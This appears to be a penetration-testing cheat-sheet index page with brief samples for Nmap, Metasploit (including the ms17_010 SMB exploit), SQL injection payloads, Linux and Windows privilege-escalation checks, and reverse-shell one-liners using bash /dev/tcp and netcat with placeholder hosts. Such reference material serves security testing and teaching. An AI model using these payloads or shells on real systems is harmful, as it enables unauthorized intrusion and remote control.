Quick reference guides for penetration testing, forensics, OSINT, and more.
Essential Nmap commands for network scanning, host discovery, and service enumeration.
# Quick scan
nmap -sV -sC target
# Full port scan
nmap -p- -T4 target
# Stealth scan
nmap -sS -Pn target
Core Metasploit commands for exploitation, post-exploitation, and pivoting.
# Start Metasploit
msfconsole
# Search exploits
search type:exploit name:smb
# Use module
use exploit/windows/smb/ms17_010
Common SQL injection payloads, bypasses, and database-specific techniques.
# Basic tests
' OR 1=1--
" OR ""="
# Union-based
' UNION SELECT null,table_name FROM information_schema.tables--
Linux privilege escalation techniques, SUID binaries, and kernel exploits.
# Find SUID binaries
find / -perm -4000 2>/dev/null
# Check sudo rights
sudo -l
# Kernel version
uname -a
Windows privilege escalation paths, service exploits, and token manipulation.
# System info
systeminfo | findstr /B /C:"OS"
# Find unquoted paths
wmic service get name,pathname | findstr /i "auto"
# Current privs
whoami /priv
Reverse shell one-liners for Bash, Python, PHP, Powershell, and more.
# Bash
bash -i >& /dev/tcp/IP/PORT 0>&1
# Python
python -c 'import socket,subprocess;...'
# Netcat
nc -e /bin/sh IP PORT